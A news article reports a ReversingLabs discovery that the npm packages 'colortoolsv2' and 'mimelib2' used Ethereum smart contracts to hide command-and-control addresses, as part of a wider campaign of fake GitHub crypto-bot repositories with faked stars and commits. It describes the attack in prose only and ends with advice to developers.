Who would’ve thought digital crooks would use something as techy as Ethereum to hide their dirty work? It sounds like a spy novel, but it’s real. Security experts recently found that cybercriminals are using Ethereum’s smart contracts – those automatic programs on the blockchain – to sneak malware into popular software packages. This clever trick lets attackers avoid getting caught. They spread computer viruses through platforms like npm and GitHub. These are places many developers use to share open-source code. This discovery shows how hackers keep finding new ways to break into software systems.
This new kind of attack is causing a stir. A detailed report from security firm ReversingLabs spilled the beans. They found two nasty packages, “colortoolsv2” and “mimelib2,” which popped up on npm in July. Npm is the biggest registry for JavaScript packages, where programmers grab tools for their apps. On the surface, these packages seemed fine. But they ran a hidden script. This script secretly checked an Ethereum smart contract to get hidden web addresses. These addresses then led to a “command and control” server, which downloaded more malware onto users’ devices.
This method is pretty sneaky. Instead of putting bad links directly into the code, which would be easy to spot, the hackers stashed them on the Ethereum blockchain. This made the bad traffic look like normal crypto activity. Lucija Valentić, a researcher at ReversingLabs, noted, “This is something we hadn’t seen before.” She added that this threat “highlights how fast malicious actors are getting better at hiding their moves in open-source code spots and from developers.”Npm quickly removed the packages after researchers reported them. Still, any developer who downloaded them might have unknowingly infected their projects.
The Bad Guys Are Also Tricking GitHub Users
The trouble isn’t just with npm. The ReversingLabs report found this is part of a bigger scheme. It includes fake repositories on GitHub, which is the largest platform for collaborative open-source code. Many crypto developers use GitHub. For example, fake repos like “solana-trading-bot-v2,” “ethereum-mev-bot-v2,” and “arbitrage-bot” pretended to be crypto trading bots. They aimed to draw in people interested in digital money. These repos looked trustworthy at first glance. They showed thousands of “commits” (code updates), lots of approval stars, and active contributors. But it was all smoke and mirrors.
In truth, the commits were fake and trivial, like just adding or deleting license files over and over. The stars came from fake accounts made in large numbers. The contributors were just “puppet accounts” controlled by the hackers, with names like “pasttimerles,” “slunfuedrac,” and “cnaovalles,” according to the report. This tactic, known as “social engineering,” tricked developers into using these bad packages in their own software. This spread the malware without anyone realizing it. As Valentić explained, “Once we decided to dig deeper into the packages, we found proof of a much larger campaign spreading across both npm and GitHub, trying to lure developers into downloading repositories that included malicious npm packages.”
Crypto Developers Need to Be Careful
This isn’t the first time we’ve seen attacks like this. In past years, hackers used trusted services like GitHub Gists, Google Drive, or OneDrive to hide bad links. But adding Ethereum smart contracts makes detection even harder. The traffic looks normal in places where blockchain is used. Last year, more than 20 similar attacks were found on platforms like npm and PyPI (for Python). Many aimed to steal crypto wallet details or install illegal crypto miners, as CoinDesk reminded everyone.
This means even free and popular online tools can be traps. Developers, especially those in the crypto world, must be careful. Things like the number of stars or commits can easily be faked. Valentić warned, “Developers and organizations need to be alert to efforts to plant malicious code in legitimate applications, access sensitive assets, and steal data or digital assets.” She suggested checking the real history of repositories and using security analysis tools before using any package. This incident really highlights the growing risks in the software supply chain. One infected package can hurt millions of applications. It’s also the latest sign that hackers are quickly learning to use the blockchain world, turning it into a new digital battleground.